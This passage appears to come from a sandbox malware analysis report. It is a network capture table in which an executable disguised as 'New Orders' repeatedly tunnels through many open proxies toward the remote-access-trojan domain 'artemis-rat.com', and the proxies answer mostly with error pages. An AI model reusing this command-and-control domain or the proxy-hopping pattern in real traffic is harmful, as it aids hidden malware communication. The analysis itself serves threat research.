                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.190689087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.648679972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        178192.168.2.950491104.27.83.183807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.326658964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.480892897 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        179192.168.2.95043967.43.227.230254917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.328675032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.776154995 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        180192.168.2.950369211.222.252.18781937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.334292889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        181192.168.2.950438199.58.185.941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.340656042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        182192.168.2.950260222.138.76.690027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.352629900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.818439960 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        183192.168.2.95046423.94.123.24388887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.373322964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.239012003 CET84INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Transfer-Encoding: chunked


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        184192.168.2.949729103.26.108.118847672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.375932932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        185192.168.2.950443184.178.172.341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.376724005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        186192.168.2.950378213.184.153.6680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.417273045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.116770029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        187192.168.2.95046867.43.236.2033357672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.417313099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.730446100 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        188192.168.2.950159117.160.250.16399907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.418023109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.963140965 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        189192.168.2.950373202.162.219.1010807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.418231010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        190192.168.2.95038691.148.127.16280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.418231010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        191192.168.2.95036795.57.216.11880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.418314934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.179310083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.555295944 CET202INHTTP/1.0 404 Not Found
                                                                                        Content-Length: 717
                                                                                        Content-Type: text/html
                                                                                        Date: Sat, 24 Apr 1971 17:37:13 GMT
                                                                                        Expires: Sat, 24 Apr 1971 17:37:13 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        192192.168.2.95041443.131.245.216156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.418317080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        193192.168.2.950353202.40.181.220312477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.418670893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        194192.168.2.950383212.108.145.19590907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.418790102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        195192.168.2.95015536.134.91.8288887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.419065952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.089227915 CET324INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.16.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        196192.168.2.950514173.245.49.27807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.419145107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.574105978 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        197192.168.2.950503159.203.61.16931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.421283960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.678603888 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        198192.168.2.95042439.105.5.126807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.426045895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.766978025 CET741INHTTP/1.1 500 Internal Server Error
                                                                                        Server: nginx/1.19.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 579
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.19.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        199192.168.2.95047172.195.34.60273917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.430054903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        200192.168.2.95056831.43.179.160807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.437129021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.592026949 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        201192.168.2.950421120.79.101.088887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.442397118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.802442074 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
